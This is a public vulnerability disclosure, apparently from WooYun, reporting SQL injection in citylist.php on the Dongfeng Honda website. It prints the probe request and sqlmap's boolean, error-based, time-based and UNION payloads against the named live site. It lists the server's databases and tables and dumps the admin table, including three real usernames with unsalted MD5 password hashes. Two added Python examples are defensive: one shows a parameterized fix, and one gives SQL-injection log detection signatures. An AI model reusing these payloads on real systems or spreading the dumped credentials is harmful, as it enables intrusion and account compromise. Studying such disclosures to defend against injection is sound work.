
Vulnerability summary

Defect ID: wooyun-2016-0175563

Title: SQL injection on the Dongfeng Honda main site

Vendor: dongfeng-honda.com

Author: 路人甲

Submitted: 2016-02-14 08:38

Fix time: 2016-02-22 09:00

Public disclosure: 2016-02-22 09:00

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: vendor was notified but ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-02-14: details sent to the vendor, awaiting vendor action
2016-02-22: vendor actively ignored the report; details disclosed to the public

Brief description:

As titled.
Just for fun, making my presence felt. Would you ever go after a big vendor?

Detailed description:

GET injection in the provid parameter of /crossdriving/citylist.php. Decoded, the probe in the request below is provid=3 AND 3*2*1=6 AND 106=106: both appended conditions are true, so an injectable endpoint returns the same city list as provid=3, while a false condition returns an empty list. The Cookie header carries acunetix-referrer.com tracking values, which indicates the probe came from an Acunetix scan; the cookies are not needed to reproduce the issue. Note that sqlmap treats a literal * in a supplied URL as a custom injection marker (hence "Parameter: #1* (URI)" in the output), so the 3*2*1 in this probe was taken as the injection point; that is why every payload below is spliced in after "provid=3 AND 3" and the leftover "21=6 AND 106=106" trails sqlmap's comment sequence.

GET /crossdriving/citylist.php?cartypeid=16631&provid=3%20AND%203*2*1%3d6%20AND%20106%3d106 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.dongfeng-honda.com/
Cookie: PHPSESSID=sg3e5k6l8mkrqlbp1qh4ttmq90; ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2281077d9616d91bf9aa7dde5c79fd7fc6%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22112.236.32.109%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1455261982%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Ddc6321ccfbb2819f54ee8db010d9b7de; WT_FPC=id=29e92c2ab4dd03fd2531455261571288:lv=1455261778668:ss=1455261571288; __utmt=1; __utma=118242844.204872392.1455261566.1455261576.1455261576.1; __utmb=118242844.6.9.1455261986478; __utmc=118242844; __utmz=118242844.1455261576.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); Hm_lvt_4698ba1a14a0b270590a11db5898b67c=1455261586,1455261603,1455261768,1455261779; Hm_lpvt_4698ba1a14a0b270590a11db5898b67c=1455261779; _ga=GA1.2.204872392.1455261566; _gat=1; pt_26906001=uid=yYK0sHrtDZo8U928JgSbwg&nid=0&vid=WliG/TLgpT9STIp0VXDMwg&vn=2&pvn=1&sact=1455261594156&to_flag=0&pl=OL3022hYLcJhu/oXOit66g*pt*1455261594156; pt_s_26906001=vt=1455261594156&cad=; Hm_lvt_e6c5317da3c5de39054ad99b8f4736ee=1455260921,1455260992,1455261566; Hm_lpvt_e6c5317da3c5de39054ad99b8f4736ee=1455261566; CNZZDATA3080075=cnzz_eid%3D202617920-1455256801-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1455256801; visited=1; HMACCOUNT=5755128E85F5C5B7; test_cookie=CheckForPermission; id=22c90e64c30400b9||t=1455261579|et=730|cs=002213fd48ebb994302e124084; pt_t_26906001=?id=26906001.yYK0sHrtDZo8U928JgSbwg.WliG/TLgpT9STIp0VXDMwg.OL3022hYLcJhu/oXOit66g.Hhv2XaeyETu40OV7MmZwQA&stat=0.0.0.0.0body.0.0.810.30000.0.0&ptif=2; bdshare_firstime=1455261656497; BAIDUID=2B1217E89F0195C2819D75A6DD86BE33:FG=1; __utmv=
Host: www.dongfeng-honda.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
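
The following is an added example, not code from the report or from the site: a small Python stand-in for the query behind citylist.php that shows why the probe above proves injection and what the parameterized fix changes. The table and column names (city, provid, name) and the sample rows are assumptions, and SQLite replaces MySQL so the example runs offline; the boolean check and the UNION read are the same shape as the report's payloads.

```python
import sqlite3

# Added example, not the site's code: a stand-in for the query behind
# citylist.php. Table and column names (city, provid, name) are assumptions;
# SQLite is used in place of MySQL so the example runs offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE city (id INTEGER PRIMARY KEY, provid INTEGER, name TEXT);
        INSERT INTO city VALUES (1, 3, 'Shijiazhuang');
        INSERT INTO city VALUES (2, 3, 'Tangshan');
        INSERT INTO city VALUES (3, 4, 'Taiyuan');
    """)
    return conn


def citylist_vulnerable(conn, provid):
    """Splices the raw query-string value into the SQL text, which is the
    behaviour the report's probes depend on."""
    sql = "SELECT name FROM city WHERE provid=" + provid
    return [row[0] for row in conn.execute(sql)]


def citylist_hardened(conn, provid):
    """Reject anything that is not a plain unsigned integer, then bind it as a
    parameter so the value can never become SQL syntax."""
    if not provid.isdigit():
        raise ValueError("provid must be an unsigned integer")
    sql = "SELECT name FROM city WHERE provid=?"
    return [row[0] for row in conn.execute(sql, (int(provid),))]


# Decoded probes in the shape the report uses. The first is the scanner's
# original test (both conditions true); the second flips one condition to
# false; the third is an analogue of sqlmap's UNION ALL SELECT payload that
# reads a different table through the same parameter.
PROBE_TRUE = "3 AND 3*2*1=6 AND 106=106"
PROBE_FALSE = "3 AND 3*2*1=7 AND 106=106"
PROBE_UNION = "0 UNION ALL SELECT name FROM sqlite_master"


def is_boolean_injectable(handler, conn):
    """Boolean-based blind check: the endpoint is injectable when a true
    condition leaves the result unchanged and a false one empties it."""
    try:
        baseline = handler(conn, "3")
        with_true = handler(conn, PROBE_TRUE)
        with_false = handler(conn, PROBE_FALSE)
    except ValueError:
        return False  # the hardened handler refused the probe outright
    return bool(baseline) and with_true == baseline and with_false == []


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", is_boolean_injectable(citylist_vulnerable, db))
    print("hardened:  ", is_boolean_injectable(citylist_hardened, db))
    print("union read:", citylist_vulnerable(db, PROBE_UNION))
```

The integer check alone would already stop every payload in this report, since all of them need spaces and keywords; the bound parameter is what makes the fix hold for string parameters as well, where a whitelist is not available.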


sqlmap identified the following injection point(s) with a total of 859 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 RLIKE (SELECT (CASE WHEN (7232=7232) THEN 0x33253230414e4425323033 ELSE 0x28 END))-- Chsz21=6 AND 106=106
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT 1292 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(1292=1292,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- yHxO21=6 AND 106=106
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))VEVh)-- LvZJ21=6 AND 106=106
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: http://www.dongfeng-honda.com:80/crossdriving/citylist.php?cartypeid=16631&provid=3 AND 3 UNION ALL SELECT NULL,NULL,CONCAT(0x717a707a71,0x62455865736f566949785a674e76596b4d766d4d724c6c596b4f6c51684b47446f46444f78497855,0x717a6b6271),NULL-- -21=6 AND 106=106
---
web application technology: PHP 5.3.9
back-end DBMS: MySQL 5.0
available databases [21]:
[*] cdcol
[*] crossdriving
[*] crossdriving3rd
[*] crv_2011
[*] dongben_wdhac
[*] dongbzt
[*] dongfeng_activity
[*] dongfeng_club
[*] greiz_luck
[*] honda
[*] honda_10year
[*] honda_2hc
[*] honda_campaign
[*] honda_stayahead
[*] hondaxy
[*] information_schema
[*] jade
[*] jiede_activity
[*] mysql
[*] phpmyadmin
[*] spirior_xrv
current database: 'honda_2hc'
current user is DBA: True
Database: honda_2hc
[54 tables]
+----------------------------+
| cd_2ws_order |
| cd_2ws_ownerstory |
| cd_admin |
| cd_admin_login |
| cd_advanced |
| cd_advanced_popedom |
| cd_adver |
| cd_adver_page |
| cd_attachment |
| cd_ci_sessions |
| cd_dream_dreams |
| cd_dream_log |
| cd_dream_log_zd |
| cd_dream_randnum |
| cd_dream_user |
| cd_filestamp |
| cd_group |
| cd_group_popedom |
| cd_hd_userinfo |
| cd_inquire |
| cd_link |
| cd_link_class |
| cd_message |
| cd_message_state |
| cd_news_class |
| cd_news_info |
| cd_reply |
| cd_rv_actinfo |
| cd_rv_area |
| cd_rv_area_copy |
| cd_rv_aream |
| cd_rv_dealer |
| cd_rv_dealer_insight |
| cd_rv_userinfo |
| cd_rv_userinfo_api |
| cd_rv_userinfo_api_toexcel |
| cd_rv_userinfo_buy |
| cd_rv_userinfo_elysion |
| cd_rv_userinfo_m |
| cd_rv_userinfo_mobile |
| cd_rv_userinfo_pcenter |
| cd_sp_log |
| cd_sp_user |
| cd_spirior_order |
| cd_system_info |
| cd_tags |
| cd_userinfo_api_ad |
| cd_v_admin |
| cd_v_inbox |
| cd_v_news_class |
| cd_v_rv_userinfo_api |
| cd_v_rv_userinfo_m |
| cdb_article |
| cdb_article_copy |
+----------------------------+
Database: honda_2hc
Table: cd_admin
[21 columns]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| answer | varchar(50) |
| birthday | varchar(10) |
| cardid | varchar(18) |
| createTime | int(11) |
| email | varchar(50) |
| group_id | smallint(6) |
| id | int(11) |
| lastLoginIp | int(11) |
| lastLoginTime | int(11) |
| loginCount | int(11) |
| mobile | varchar(30) |
| modifyTime | int(11) |
| msn | varchar(50) |
| name | varchar(30) |
| pass | varchar(32) |
| phone | varchar(30) |
| posts | varchar(50) |
| qq | varchar(20) |
| question | varchar(50) |
| realname | varchar(50) |
| state | tinyint(4) |
+---------------+-------------+
Database: honda_2hc
Table: cd_admin
[3 entries]
+---------+----------------------------------+
| name | pass |
+---------+----------------------------------+
| admin | cc03577bda0309a89498a1c7a58f3f62 |
| yangnan | 8e005e4bbecd53c1fa6f244d5b4af170 |
| jiahuan | 1eb2eb89d66acd6799084e07cda6a0f6 |
+---------+----------------------------------+


What the dump shows: the account the web application uses to reach MySQL is a DBA ("current user is DBA: True") and can see 21 databases, including mysql and phpmyadmin, so a single injectable parameter exposes every application on that server rather than just honda_2hc. The cd_admin.pass column is varchar(32) and the dumped values are 32 hexadecimal characters, consistent with unsalted MD5 rather than a salted password hash; the cd_rv_userinfo* tables in the same database suggest customer records are reachable by the same route.

Screenshot:

YQPK0E8IV5`F2E@IAG0BB_3.png
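
The sqlmap session above took 859 requests and used four distinct techniques against one parameter, all of which leave recognisable request lines in the web server's access log. As an added example that is not part of the report, the Python below turns those payloads into detection signatures and runs them over a constructed access log in common log format. The client addresses and timestamps are made up; the query strings are the URL-encoded forms of the report's own probe and payloads.

```python
import re
from urllib.parse import unquote_plus

# Added example, not part of the report: signatures derived from the payloads
# sqlmap and the initial scanner probe sent to citylist.php. They are applied
# to the URL-decoded request line, so encoding alone does not evade them.
SIGNATURES = {
    "boolean-arith-probe": re.compile(r"\bAND\s+\d+\*\d+\*\d+\s*=\s*\d+", re.I),
    "boolean-rlike":       re.compile(r"\bRLIKE\s*\(\s*SELECT\b", re.I),
    "error-rand-groupby":  re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?GROUP\s+BY", re.I | re.S),
    "time-sleep":          re.compile(r"\bSLEEP\s*\(\s*\d+(\.\d+)?\s*\)", re.I),
    "union-select":        re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "info-schema":         re.compile(r"\bINFORMATION_SCHEMA\.", re.I),
}

# Common log format: client, identity, user, [time] "METHOD URI PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)


def classify(uri):
    """Return the sorted signature names matching a request URI after
    URL-decoding it twice (the second pass catches double-encoded payloads)."""
    decoded = unquote_plus(unquote_plus(uri))
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


def scan(log_lines):
    """Return (client_ip, path, tags) for every request matching a signature."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("uri"))
        if tags:
            hits.append((m.group("ip"), m.group("uri").split("?", 1)[0], tags))
    return hits


def by_source(hits):
    """Count matching requests per client address; a scanner run such as the
    859-request sqlmap session in the report stands out by volume."""
    counts = {}
    for ip, _path, _tags in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


# Constructed sample log: addresses and times are invented, query strings are
# the encoded forms of the report's probe and sqlmap payloads.
SAMPLE_LOG = [
    '203.0.113.10 - - [14/Feb/2016:08:20:11 +0800] "GET /crossdriving/citylist.php?cartypeid=16631&provid=3 HTTP/1.1" 200 1834',
    '203.0.113.10 - - [14/Feb/2016:08:20:12 +0800] "GET /crossdriving/citylist.php?cartypeid=16631&provid=3%20AND%203*2*1%3d6%20AND%20106%3d106 HTTP/1.1" 200 1834',
    '203.0.113.10 - - [14/Feb/2016:08:20:19 +0800] "GET /crossdriving/citylist.php?cartypeid=16631&provid=3%20AND%203%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29VEVh%29--%20LvZJ21%3D6%20AND%20106%3D106 HTTP/1.1" 200 1834',
    '203.0.113.10 - - [14/Feb/2016:08:20:25 +0800] "GET /crossdriving/citylist.php?cartypeid=16631&provid=3%20AND%203%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x717a707a71%2C0x62%2C0x717a6b6271%29%2CNULL--%20-21%3D6%20AND%20106%3D106 HTTP/1.1" 200 1902',
    '203.0.113.10 - - [14/Feb/2016:08:20:31 +0800] "GET /crossdriving/citylist.php?cartypeid=16631&provid=3%20AND%203%20AND%20%28SELECT%201292%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a707a71%2C%28SELECT%20%28ELT%281292%3D1292%2C1%29%29%29%2C0x717a6b6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29--%20yHxO21%3D6%20AND%20106%3D106 HTTP/1.1" 500 0',
    '198.51.100.7 - - [14/Feb/2016:08:21:02 +0800] "GET /news.php?q=union+station HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for ip, path, tags in scan(SAMPLE_LOG):
        print(ip, path, ", ".join(tags))
    print(by_source(scan(SAMPLE_LOG)))
```

The patterns are deliberately narrow (UNION must be followed by SELECT, SLEEP must take a numeric argument) so that ordinary text such as "union station" does not fire; the 500 status on the error-based request is a second, signature-free signal worth correlating, since that technique works by forcing the database to raise an error.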


Proof of vulnerability:


Same request and sqlmap output as in the detailed description above.


Fix recommendation:

Copyright: credit 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2016-02-22 09:00

Vendor reply:

Rank: 4 (WooYun assessment)

Latest status:

None


Comments:

  1. 2016-02-20 22:08 | SunnyDoll ( intern white hat | Rank:63 reports:20 | professional brick hauler)

    @dongfeng-honda.com planning to ignore this?

  2. 2016-02-22 15:58 | SunnyDoll ( intern white hat | Rank:63 reports:20 | professional brick hauler)

    @疯狗 @浩天 how does a hole like this get ignored?

  3. 2016-02-22 15:59 | SunnyDoll ( intern white hat | Rank:63 reports:20 | professional brick hauler)

    @dongfeng-honda.com why on earth was it ignored? I'd like to know... no threat?